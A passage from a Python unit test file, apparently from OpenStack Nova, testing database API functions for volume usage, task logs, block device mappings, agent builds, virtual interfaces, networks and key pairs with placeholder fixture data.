rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1',
update_totals=True)
vol_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
expected_vol_usage = {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'availability_zone': 'fake-az',
'user_id': 'fake-user-uuid1',
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'tot_reads': 10100,
'tot_read_bytes': 20200,
'tot_writes': 30300,
'tot_write_bytes': 40400}
for key, value in expected_vol_usage.items():
self.assertEqual(vol_usage[key], value, key)
class TaskLogTestCase(test.TestCase):
def setUp(self):
super(TaskLogTestCase, self).setUp()
self.context = context.get_admin_context()
now = timeutils.utcnow()
self.begin = now - datetime.timedelta(seconds=10)
self.end = now - datetime.timedelta(seconds=5)
self.task_name = 'fake-task-name'
self.host = 'fake-host'
self.message = 'Fake task message'
db.task_log_begin_task(self.context, self.task_name, self.begin,
self.end, self.host, message=self.message)
def test_task_log_get(self):
result = db.task_log_get(self.context, self.task_name, self.begin,
self.end, self.host)
self.assertEqual(result['task_name'], self.task_name)
self.assertEqual(result['period_beginning'], self.begin)
self.assertEqual(result['period_ending'], self.end)
self.assertEqual(result['host'], self.host)
self.assertEqual(result['message'], self.message)
def test_task_log_get_all(self):
result = db.task_log_get_all(self.context, self.task_name, self.begin,
self.end, host=self.host)
self.assertEqual(len(result), 1)
result = db.task_log_get_all(self.context, self.task_name, self.begin,
self.end, host=self.host, state='')
self.assertEqual(len(result), 0)
def test_task_log_begin_task(self):
db.task_log_begin_task(self.context, 'fake', self.begin,
self.end, self.host, task_items=42,
message=self.message)
result = db.task_log_get(self.context, 'fake', self.begin,
self.end, self.host)
self.assertEqual(result['task_name'], 'fake')
def test_task_log_begin_task_duplicate(self):
params = (self.context, 'fake', self.begin, self.end, self.host)
db.task_log_begin_task(*params, message=self.message)
self.assertRaises(exception.TaskAlreadyRunning,
db.task_log_begin_task,
*params, message=self.message)
def test_task_log_end_task(self):
errors = 1
db.task_log_end_task(self.context, self.task_name, self.begin,
self.end, self.host, errors, message=self.message)
result = db.task_log_get(self.context, self.task_name, self.begin,
self.end, self.host)
self.assertEqual(result['errors'], 1)
def test_task_log_end_task_task_not_running(self):
self.assertRaises(exception.TaskNotRunning,
db.task_log_end_task, self.context, 'nonexistent',
self.begin, self.end, self.host, 42,
message=self.message)
class BlockDeviceMappingTestCase(test.TestCase):
def setUp(self):
super(BlockDeviceMappingTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, {})
def _create_bdm(self, values):
values.setdefault('instance_uuid', self.instance['uuid'])
values.setdefault('device_name', 'fake_device')
values.setdefault('source_type', 'volume')
values.setdefault('destination_type', 'volume')
block_dev = block_device.BlockDeviceDict(values)
db.block_device_mapping_create(self.ctxt, block_dev, legacy=False)
uuid = block_dev['instance_uuid']
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
for bdm in bdms:
if bdm['device_name'] == values['device_name']:
return bdm
def test_scrub_empty_str_values_no_effect(self):
values = {'volume_size': 5}
expected = copy.copy(values)
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, expected)
def test_scrub_empty_str_values_empty_string(self):
values = {'volume_size': ''}
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, {})
def test_scrub_empty_str_values_empty_unicode(self):
values = {'volume_size': u''}
sqlalchemy_api._scrub_empty_str_values(values, ['volume_size'])
self.assertEqual(values, {})
def test_block_device_mapping_create(self):
bdm = self._create_bdm({})
self.assertIsNotNone(bdm)
def test_block_device_mapping_update(self):
bdm = self._create_bdm({})
result = db.block_device_mapping_update(
self.ctxt, bdm['id'], {'destination_type': 'moon'},
legacy=False)
uuid = bdm['instance_uuid']
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(bdm_real[0]['destination_type'], 'moon')
# Also make sure the update call returned correct data
self.assertEqual(dict(bdm_real[0].iteritems()),
dict(result.iteritems()))
def test_block_device_mapping_update_or_create(self):
values = {
'instance_uuid': self.instance['uuid'],
'device_name': 'fake_name',
'source_type': 'volume',
'destination_type': 'volume'
}
# check create
db.block_device_mapping_update_or_create(self.ctxt, values,
legacy=False)
uuid = values['instance_uuid']
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
self.assertEqual(bdm_real[0]['device_name'], 'fake_name')
# check update
values['destination_type'] = 'camelot'
db.block_device_mapping_update_or_create(self.ctxt, values,
legacy=False)
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
bdm_real = bdm_real[0]
self.assertEqual(bdm_real['device_name'], 'fake_name')
self.assertEqual(bdm_real['destination_type'], 'camelot')
# check create without device_name
bdm1 = dict(values)
bdm1['device_name'] = None
db.block_device_mapping_update_or_create(self.ctxt, bdm1, legacy=False)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
with_device_name = [b for b in bdms if b['device_name'] is not None]
without_device_name = [b for b in bdms if b['device_name'] is None]
self.assertEqual(len(with_device_name), 1,
'expected 1 bdm with device_name, found %d' %
len(with_device_name))
self.assertEqual(len(without_device_name), 1,
'expected 1 bdm without device_name, found %d' %
len(without_device_name))
# check create multiple devices without device_name
bdm2 = dict(values)
bdm2['device_name'] = None
db.block_device_mapping_update_or_create(self.ctxt, bdm2, legacy=False)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
with_device_name = [b for b in bdms if b['device_name'] is not None]
without_device_name = [b for b in bdms if b['device_name'] is None]
self.assertEqual(len(with_device_name), 1,
'expected 1 bdm with device_name, found %d' %
len(with_device_name))
self.assertEqual(len(without_device_name), 2,
'expected 2 bdms without device_name, found %d' %
len(without_device_name))
def test_block_device_mapping_update_or_create_multiple_ephemeral(self):
uuid = self.instance['uuid']
values = {
'instance_uuid': uuid,
'source_type': 'blank',
'guest_format': 'myformat',
}
bdm1 = dict(values)
bdm1['device_name'] = '/dev/sdb'
db.block_device_mapping_update_or_create(self.ctxt, bdm1, legacy=False)
bdm2 = dict(values)
bdm2['device_name'] = '/dev/sdc'
db.block_device_mapping_update_or_create(self.ctxt, bdm2, legacy=False)
bdm_real = sorted(
db.block_device_mapping_get_all_by_instance(self.ctxt, uuid),
key=lambda bdm: bdm['device_name']
)
self.assertEqual(len(bdm_real), 2)
for bdm, device_name in zip(bdm_real, ['/dev/sdb', '/dev/sdc']):
self.assertEqual(bdm['device_name'], device_name)
self.assertEqual(bdm['guest_format'], 'myformat')
def test_block_device_mapping_update_or_create_check_remove_virt(self):
uuid = self.instance['uuid']
values = {
'instance_uuid': uuid,
'source_type': 'blank',
'destination_type': 'local',
'guest_format': 'swap',
}
# check that old swap bdms are deleted on create
val1 = dict(values)
val1['device_name'] = 'device1'
db.block_device_mapping_create(self.ctxt, val1, legacy=False)
val2 = dict(values)
val2['device_name'] = 'device2'
db.block_device_mapping_update_or_create(self.ctxt, val2, legacy=False)
bdm_real = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdm_real), 1)
bdm_real = bdm_real[0]
self.assertEqual(bdm_real['device_name'], 'device2')
self.assertEqual(bdm_real['source_type'], 'blank')
self.assertEqual(bdm_real['guest_format'], 'swap')
db.block_device_mapping_destroy(self.ctxt, bdm_real['id'])
def test_block_device_mapping_get_all_by_instance(self):
uuid1 = self.instance['uuid']
uuid2 = db.instance_create(self.ctxt, {})['uuid']
bmds_values = [{'instance_uuid': uuid1,
'device_name': '/dev/vda'},
{'instance_uuid': uuid2,
'device_name': '/dev/vdb'},
{'instance_uuid': uuid2,
'device_name': '/dev/vdc'}]
for bdm in bmds_values:
self._create_bdm(bdm)
bmd = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid1)
self.assertEqual(len(bmd), 1)
self.assertEqual(bmd[0]['device_name'], '/dev/vda')
bmd = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid2)
self.assertEqual(len(bmd), 2)
def test_block_device_mapping_destroy(self):
bdm = self._create_bdm({})
db.block_device_mapping_destroy(self.ctxt, bdm['id'])
bdm = db.block_device_mapping_get_all_by_instance(self.ctxt,
bdm['instance_uuid'])
self.assertEqual(len(bdm), 0)
def test_block_device_mapping_destroy_by_instance_and_volume(self):
vol_id1 = '69f5c254-1a5b-4fff-acf7-cb369904f58f'
vol_id2 = '69f5c254-1a5b-4fff-acf7-cb369904f59f'
self._create_bdm({'device_name': '/dev/vda', 'volume_id': vol_id1})
self._create_bdm({'device_name': '/dev/vdb', 'volume_id': vol_id2})
uuid = self.instance['uuid']
db.block_device_mapping_destroy_by_instance_and_volume(self.ctxt, uuid,
vol_id1)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['device_name'], '/dev/vdb')
def test_block_device_mapping_destroy_by_instance_and_device(self):
self._create_bdm({'device_name': '/dev/vda'})
self._create_bdm({'device_name': '/dev/vdb'})
uuid = self.instance['uuid']
params = (self.ctxt, uuid, '/dev/vdb')
db.block_device_mapping_destroy_by_instance_and_device(*params)
bdms = db.block_device_mapping_get_all_by_instance(self.ctxt, uuid)
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['device_name'], '/dev/vda')
def test_block_device_mapping_get_by_volume_id(self):
self._create_bdm({'volume_id': 'fake_id'})
bdm = db.block_device_mapping_get_by_volume_id(self.ctxt, 'fake_id')
self.assertEqual(bdm['volume_id'], 'fake_id')
def test_block_device_mapping_get_by_volume_id_join_instance(self):
self._create_bdm({'volume_id': 'fake_id'})
bdm = db.block_device_mapping_get_by_volume_id(self.ctxt, 'fake_id',
['instance'])
self.assertEqual(bdm['volume_id'], 'fake_id')
self.assertEqual(bdm['instance']['uuid'], self.instance['uuid'])
class AgentBuildTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.agent_build_* methods."""
def setUp(self):
super(AgentBuildTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_agent_build_create_and_get_all(self):
self.assertEqual(0, len(db.agent_build_get_all(self.ctxt)))
agent_build = db.agent_build_create(self.ctxt, {'os': 'GNU/HURD'})
all_agent_builds = db.agent_build_get_all(self.ctxt)
self.assertEqual(1, len(all_agent_builds))
self._assertEqualObjects(agent_build, all_agent_builds[0])
def test_agent_build_get_by_triple(self):
agent_build = db.agent_build_create(self.ctxt, {'hypervisor': 'kvm',
'os': 'FreeBSD', 'architecture': arch.X86_64})
self.assertIsNone(db.agent_build_get_by_triple(self.ctxt, 'kvm',
'FreeBSD', 'i386'))
self._assertEqualObjects(agent_build, db.agent_build_get_by_triple(
self.ctxt, 'kvm', 'FreeBSD', arch.X86_64))
def test_agent_build_destroy(self):
agent_build = db.agent_build_create(self.ctxt, {})
self.assertEqual(1, len(db.agent_build_get_all(self.ctxt)))
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertEqual(0, len(db.agent_build_get_all(self.ctxt)))
def test_agent_build_update(self):
agent_build = db.agent_build_create(self.ctxt, {'os': 'HaikuOS'})
db.agent_build_update(self.ctxt, agent_build.id, {'os': 'ReactOS'})
self.assertEqual('ReactOS', db.agent_build_get_all(self.ctxt)[0].os)
def test_agent_build_destroy_destroyed(self):
agent_build = db.agent_build_create(self.ctxt, {})
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertRaises(exception.AgentBuildNotFound,
db.agent_build_destroy, self.ctxt, agent_build.id)
def test_agent_build_update_destroyed(self):
agent_build = db.agent_build_create(self.ctxt, {'os': 'HaikuOS'})
db.agent_build_destroy(self.ctxt, agent_build.id)
self.assertRaises(exception.AgentBuildNotFound,
db.agent_build_update, self.ctxt, agent_build.id, {'os': 'OS/2'})
def test_agent_build_exists(self):
values = {'hypervisor': 'kvm', 'os': 'FreeBSD',
'architecture': arch.X86_64}
db.agent_build_create(self.ctxt, values)
self.assertRaises(exception.AgentBuildExists, db.agent_build_create,
self.ctxt, values)
def test_agent_build_get_all_by_hypervisor(self):
values = {'hypervisor': 'kvm', 'os': 'FreeBSD',
'architecture': arch.X86_64}
created = db.agent_build_create(self.ctxt, values)
actual = db.agent_build_get_all(self.ctxt, hypervisor='kvm')
self._assertEqualListsOfObjects([created], actual)
class VirtualInterfaceTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(VirtualInterfaceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance_uuid = db.instance_create(self.ctxt, {})['uuid']
values = {'host': 'localhost', 'project_id': 'project1'}
self.network = db.network_create_safe(self.ctxt, values)
def _get_base_values(self):
return {
'instance_uuid': self.instance_uuid,
'address': 'fake_address',
'network_id': self.network['id'],
'uuid': str(stdlib_uuid.uuid4())
}
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def _create_virt_interface(self, values):
v = self._get_base_values()
v.update(values)
return db.virtual_interface_create(self.ctxt, v)
def test_virtual_interface_create(self):
vif = self._create_virt_interface({})
self.assertIsNotNone(vif['id'])
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'uuid']
self._assertEqualObjects(vif, self._get_base_values(), ignored_keys)
def test_virtual_interface_create_with_duplicate_address(self):
vif = self._create_virt_interface({})
self.assertRaises(exception.VirtualInterfaceCreateException,
self._create_virt_interface, {"uuid": vif['uuid']})
def test_virtual_interface_get(self):
vifs = [self._create_virt_interface({'address': 'a'}),
self._create_virt_interface({'address': 'b'})]
for vif in vifs:
real_vif = db.virtual_interface_get(self.ctxt, vif['id'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_address(self):
vifs = [self._create_virt_interface({'address': 'first'}),
self._create_virt_interface({'address': 'second'})]
for vif in vifs:
real_vif = db.virtual_interface_get_by_address(self.ctxt,
vif['address'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_address_not_found(self):
self.assertIsNone(db.virtual_interface_get_by_address(self.ctxt,
"i.nv.ali.ip"))
def test_virtual_interface_get_by_address_data_error_exception(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidIpAddressError,
db.virtual_interface_get_by_address,
self.ctxt,
"i.nv.ali.ip")
def test_virtual_interface_get_by_uuid(self):
vifs = [self._create_virt_interface({"address": "address_1"}),
self._create_virt_interface({"address": "address_2"})]
for vif in vifs:
real_vif = db.virtual_interface_get_by_uuid(self.ctxt, vif['uuid'])
self._assertEqualObjects(vif, real_vif)
def test_virtual_interface_get_by_instance(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
vifs1 = [self._create_virt_interface({'address': 'fake1'}),
self._create_virt_interface({'address': 'fake2'})]
# multiple nic of same instance
vifs2 = [self._create_virt_interface({'address': 'fake3',
'instance_uuid': inst_uuid2}),
self._create_virt_interface({'address': 'fake4',
'instance_uuid': inst_uuid2})]
vifs1_real = db.virtual_interface_get_by_instance(self.ctxt,
self.instance_uuid)
vifs2_real = db.virtual_interface_get_by_instance(self.ctxt,
inst_uuid2)
self._assertEqualListsOfObjects(vifs1, vifs1_real)
self._assertEqualOrderedListOfObjects(vifs2, vifs2_real)
def test_virtual_interface_get_by_instance_and_network(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = {'host': 'localhost', 'project_id': 'project2'}
network_id = db.network_create_safe(self.ctxt, values)['id']
vifs = [self._create_virt_interface({'address': 'fake1'}),
self._create_virt_interface({'address': 'fake2',
'network_id': network_id,
'instance_uuid': inst_uuid2}),
self._create_virt_interface({'address': 'fake3',
'instance_uuid': inst_uuid2})]
for vif in vifs:
params = (self.ctxt, vif['instance_uuid'], vif['network_id'])
r_vif = db.virtual_interface_get_by_instance_and_network(*params)
self._assertEqualObjects(r_vif, vif)
def test_virtual_interface_delete_by_instance(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = [dict(address='fake1'), dict(address='fake2'),
dict(address='fake3', instance_uuid=inst_uuid2)]
for vals in values:
self._create_virt_interface(vals)
db.virtual_interface_delete_by_instance(self.ctxt, self.instance_uuid)
real_vifs1 = db.virtual_interface_get_by_instance(self.ctxt,
self.instance_uuid)
real_vifs2 = db.virtual_interface_get_by_instance(self.ctxt,
inst_uuid2)
self.assertEqual(len(real_vifs1), 0)
self.assertEqual(len(real_vifs2), 1)
def test_virtual_interface_get_all(self):
inst_uuid2 = db.instance_create(self.ctxt, {})['uuid']
values = [dict(address='fake1'), dict(address='fake2'),
dict(address='fake3', instance_uuid=inst_uuid2)]
vifs = [self._create_virt_interface(val) for val in values]
real_vifs = db.virtual_interface_get_all(self.ctxt)
self._assertEqualListsOfObjects(vifs, real_vifs)
class NetworkTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.network_* methods."""
def setUp(self):
super(NetworkTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_associated_fixed_ip(self, host, cidr, ip):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': cidr})
self.assertFalse(db.network_in_use_on_host(self.ctxt, network.id,
host))
instance = db.instance_create(self.ctxt,
{'project_id': 'project1', 'host': host})
virtual_interface = db.virtual_interface_create(self.ctxt,
{'instance_uuid': instance.uuid, 'network_id': network.id,
'address': ip})
db.fixed_ip_create(self.ctxt, {'address': ip,
'network_id': network.id, 'allocated': True,
'virtual_interface_id': virtual_interface.id})
db.fixed_ip_associate(self.ctxt, ip, instance.uuid,
network.id)
return network, instance
def test_network_get_associated_default_route(self):
network, instance = self._get_associated_fixed_ip('host.net',
'192.0.2.0/30', '192.0.2.1')
network2 = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': '192.0.3.0/30'})
ip = '192.0.3.1'
virtual_interface = db.virtual_interface_create(self.ctxt,
{'instance_uuid': instance.uuid, 'network_id': network2.id,
'address': ip})
db.fixed_ip_create(self.ctxt, {'address': ip,
'network_id': network2.id, 'allocated': True,
'virtual_interface_id': virtual_interface.id})
db.fixed_ip_associate(self.ctxt, ip, instance.uuid,
network2.id)
data = db.network_get_associated_fixed_ips(self.ctxt, network.id)
self.assertEqual(1, len(data))
self.assertTrue(data[0]['default_route'])
data = db.network_get_associated_fixed_ips(self.ctxt, network2.id)
self.assertEqual(1, len(data))
self.assertFalse(data[0]['default_route'])
def test_network_get_associated_fixed_ips(self):
network, instance = self._get_associated_fixed_ip('host.net',
'192.0.2.0/30', '192.0.2.1')
data = db.network_get_associated_fixed_ips(self.ctxt, network.id)
self.assertEqual(1, len(data))
self.assertEqual('192.0.2.1', data[0]['address'])
self.assertEqual('192.0.2.1', data[0]['vif_address'])
self.assertEqual(instance.uuid, data[0]['instance_uuid'])
self.assertTrue(data[0]['allocated'])
def test_network_create_safe(self):
values = {'host': 'localhost', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertEqual(36, len(network['uuid']))
db_network = db.network_get(self.ctxt, network['id'])
self._assertEqualObjects(network, db_network)
def test_network_create_with_duplicate_vlan(self):
values1 = {'host': 'localhost', 'project_id': 'project1', 'vlan': 1}
values2 = {'host': 'something', 'project_id': 'project1', 'vlan': 1}
db.network_create_safe(self.ctxt, values1)
self.assertRaises(exception.DuplicateVlan,
db.network_create_safe, self.ctxt, values2)
def test_network_delete_safe(self):
values = {'host': 'localhost', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
db.network_get(self.ctxt, network['id'])
values = {'network_id': network['id'], 'address': '192.168.1.5'}
address1 = db.fixed_ip_create(self.ctxt, values)['address']
values = {'network_id': network['id'],
'address': '192.168.1.6',
'allocated': True}
address2 = db.fixed_ip_create(self.ctxt, values)['address']
self.assertRaises(exception.NetworkInUse,
db.network_delete_safe, self.ctxt, network['id'])
db.fixed_ip_update(self.ctxt, address2, {'allocated': False})
network = db.network_delete_safe(self.ctxt, network['id'])
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address1)
ctxt = self.ctxt.elevated(read_deleted='yes')
fixed_ip = db.fixed_ip_get_by_address(ctxt, address1)
self.assertTrue(fixed_ip['deleted'])
def test_network_in_use_on_host(self):
values = {'host': 'foo', 'hostname': 'myname'}
instance = db.instance_create(self.ctxt, values)
values = {'address': '192.168.1.5', 'instance_uuid': instance['uuid']}
vif = db.virtual_interface_create(self.ctxt, values)
values = {'address': '192.168.1.6',
'network_id': 1,
'allocated': True,
'instance_uuid': instance['uuid'],
'virtual_interface_id': vif['id']}
db.fixed_ip_create(self.ctxt, values)
self.assertEqual(db.network_in_use_on_host(self.ctxt, 1, 'foo'), True)
self.assertEqual(db.network_in_use_on_host(self.ctxt, 1, 'bar'), False)
def test_network_update_nonexistent(self):
self.assertRaises(exception.NetworkNotFound,
db.network_update, self.ctxt, 123456, {})
def test_network_update_with_duplicate_vlan(self):
values1 = {'host': 'localhost', 'project_id': 'project1', 'vlan': 1}
values2 = {'host': 'something', 'project_id': 'project1', 'vlan': 2}
network_ref = db.network_create_safe(self.ctxt, values1)
db.network_create_safe(self.ctxt, values2)
self.assertRaises(exception.DuplicateVlan,
db.network_update, self.ctxt,
network_ref["id"], values2)
def test_network_update(self):
network = db.network_create_safe(self.ctxt, {'project_id': 'project1',
'vlan': 1, 'host': 'test.com'})
db.network_update(self.ctxt, network.id, {'vlan': 2})
network_new = db.network_get(self.ctxt, network.id)
self.assertEqual(2, network_new.vlan)
def test_network_set_host_nonexistent_network(self):
self.assertEqual(0, db.network_set_host(
self.ctxt, 123456, 'nonexistent'))
def test_network_set_host_already_set(self):
values = {'host': 'example.com', 'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertEqual(0, db.network_set_host(
self.ctxt, network.id, 'new.example.com'))
def test_network_set_host_with_initially_no_host(self):
values = {'project_id': 'project1'}
network = db.network_create_safe(self.ctxt, values)
self.assertEqual(1, db.network_set_host(
self.ctxt, network.id, 'example.com'))
self.assertEqual('example.com',
db.network_get(self.ctxt, network.id).host)
def test_network_get_all_by_host(self):
self.assertEqual([],
db.network_get_all_by_host(self.ctxt, 'example.com'))
host = 'h1.example.com'
# network with host set
net1 = db.network_create_safe(self.ctxt, {'host': host})
self._assertEqualListsOfObjects([net1],
db.network_get_all_by_host(self.ctxt, host))
# network with fixed ip with host set
net2 = db.network_create_safe(self.ctxt, {})
db.fixed_ip_create(self.ctxt, {'host': host, 'network_id': net2.id})
db.network_get_all_by_host(self.ctxt, host)
self._assertEqualListsOfObjects([net1, net2],
db.network_get_all_by_host(self.ctxt, host))
# network with instance with host set
net3 = db.network_create_safe(self.ctxt, {})
instance = db.instance_create(self.ctxt, {'host': host})
db.fixed_ip_create(self.ctxt, {'network_id': net3.id,
'instance_uuid': instance.uuid})
self._assertEqualListsOfObjects([net1, net2, net3],
db.network_get_all_by_host(self.ctxt, host))
def test_network_get_by_cidr(self):
cidr = '192.0.2.0/30'
cidr_v6 = '2001:db8:1::/64'
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'cidr': cidr, 'cidr_v6': cidr_v6})
self._assertEqualObjects(network,
db.network_get_by_cidr(self.ctxt, cidr))
self._assertEqualObjects(network,
db.network_get_by_cidr(self.ctxt, cidr_v6))
def test_network_get_by_cidr_nonexistent(self):
self.assertRaises(exception.NetworkNotFoundForCidr,
db.network_get_by_cidr, self.ctxt, '192.0.2.0/30')
def test_network_get_by_uuid(self):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project_1'})
self._assertEqualObjects(network,
db.network_get_by_uuid(self.ctxt, network.uuid))
def test_network_get_by_uuid_nonexistent(self):
self.assertRaises(exception.NetworkNotFoundForUUID,
db.network_get_by_uuid, self.ctxt, 'non-existent-uuid')
def test_network_get_all_by_uuids_no_networks(self):
self.assertRaises(exception.NoNetworksFound,
db.network_get_all_by_uuids, self.ctxt, ['non-existent-uuid'])
def test_network_get_all_by_uuids(self):
net1 = db.network_create_safe(self.ctxt, {})
net2 = db.network_create_safe(self.ctxt, {})
self._assertEqualListsOfObjects([net1, net2],
db.network_get_all_by_uuids(self.ctxt, [net1.uuid, net2.uuid]))
def test_network_get_all_no_networks(self):
self.assertRaises(exception.NoNetworksFound,
db.network_get_all, self.ctxt)
def test_network_get_all(self):
network = db.network_create_safe(self.ctxt, {})
network_db = db.network_get_all(self.ctxt)
self.assertEqual(1, len(network_db))
self._assertEqualObjects(network, network_db[0])
def test_network_get_all_admin_user(self):
network1 = db.network_create_safe(self.ctxt, {})
network2 = db.network_create_safe(self.ctxt,
{'project_id': 'project1'})
self._assertEqualListsOfObjects([network1, network2],
db.network_get_all(self.ctxt,
project_only=True))
def test_network_get_all_normal_user(self):
normal_ctxt = context.RequestContext('fake', 'fake')
db.network_create_safe(self.ctxt, {})
db.network_create_safe(self.ctxt, {'project_id': 'project1'})
network1 = db.network_create_safe(self.ctxt,
{'project_id': 'fake'})
network_db = db.network_get_all(normal_ctxt, project_only=True)
self.assertEqual(1, len(network_db))
self._assertEqualObjects(network1, network_db[0])
def test_network_get(self):
network = db.network_create_safe(self.ctxt, {})
self._assertEqualObjects(db.network_get(self.ctxt, network.id),
network)
db.network_delete_safe(self.ctxt, network.id)
self.assertRaises(exception.NetworkNotFound,
db.network_get, self.ctxt, network.id)
def test_network_associate(self):
network = db.network_create_safe(self.ctxt, {})
self.assertIsNone(network.project_id)
db.network_associate(self.ctxt, "project1", network.id)
self.assertEqual("project1", db.network_get(self.ctxt,
network.id).project_id)
def test_network_diassociate(self):
network = db.network_create_safe(self.ctxt,
{'project_id': 'project1', 'host': 'test.net'})
# disassociate project
db.network_disassociate(self.ctxt, network.id, False, True)
self.assertIsNone(db.network_get(self.ctxt, network.id).project_id)
# disassociate host
db.network_disassociate(self.ctxt, network.id, True, False)
self.assertIsNone(db.network_get(self.ctxt, network.id).host)
def test_network_count_reserved_ips(self):
net = db.network_create_safe(self.ctxt, {})
self.assertEqual(0, db.network_count_reserved_ips(self.ctxt, net.id))
db.fixed_ip_create(self.ctxt, {'network_id': net.id,
'reserved': True})
self.assertEqual(1, db.network_count_reserved_ips(self.ctxt, net.id))
class KeyPairTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(KeyPairTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_key_pair(self, values):
return db.key_pair_create(self.ctxt, values)
def test_key_pair_create(self):
param = {
'name': 'test_1',
'type': 'ssh',
'user_id': 'test_user_id_1',
'public_key': 'test_public_key_1',
'fingerprint': 'test_fingerprint_1'
}
key_pair = self._create_key_pair(param)
self.assertIsNotNone(key_pair['id'])
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(key_pair, param, ignored_keys)
def test_key_pair_create_with_duplicate_name(self):
params = {'name': 'test_name', 'user_id': 'test_user_id',
'type': 'ssh'}
self._create_key_pair(params)
self.assertRaises(exception.KeyPairExists, self._create_key_pair,
params)
def test_key_pair_get(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_2', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_3', 'type': 'ssh'}
]
key_pairs = [self._create_key_pair(p) for p in params]
for key in key_pairs:
real_key = db.key_pair_get(self.ctxt, key['user_id'], key['name'])
self._assertEqualObjects(key, real_key)
def test_key_pair_get_no_results(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1'}
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
def test_key_pair_get_deleted(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'}
key_pair_created = self._create_key_pair(param)
db.key_pair_destroy(self.ctxt, param['user_id'], param['name'])
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
ctxt = self.ctxt.elevated(read_deleted='yes')
key_pair_deleted = db.key_pair_get(ctxt, param['user_id'],
param['name'])
ignored_keys = ['deleted', 'created_at', 'updated_at', 'deleted_at']
self._assertEqualObjects(key_pair_deleted, key_pair_created,
ignored_keys)
self.assertEqual(key_pair_deleted['deleted'], key_pair_deleted['id'])
def test_key_pair_get_all_by_user(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_2', 'type': 'ssh'}
]
key_pairs_user_1 = [self._create_key_pair(p) for p in params
if p['user_id'] == 'test_user_id_1']
key_pairs_user_2 = [self._create_key_pair(p) for p in params
if p['user_id'] == 'test_user_id_2']
real_keys_1 = db.key_pair_get_all_by_user(self.ctxt, 'test_user_id_1')
real_keys_2 = db.key_pair_get_all_by_user(self.ctxt, 'test_user_id_2')
self._assertEqualListsOfObjects(key_pairs_user_1, real_keys_1)
self._assertEqualListsOfObjects(key_pairs_user_2, real_keys_2)
def test_key_pair_count_by_user(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_2', 'type': 'ssh'}
]
for p in params:
self._create_key_pair(p)
count_1 = db.key_pair_count_by_user(self.ctxt, 'test_user_id_1')
self.assertEqual(count_1, 2)
count_2 = db.key_pair_count_by_user(self.ctxt, 'test_user_id_2')
self.assertEqual(count_2, 1)
def test_key_pair_destroy(self):
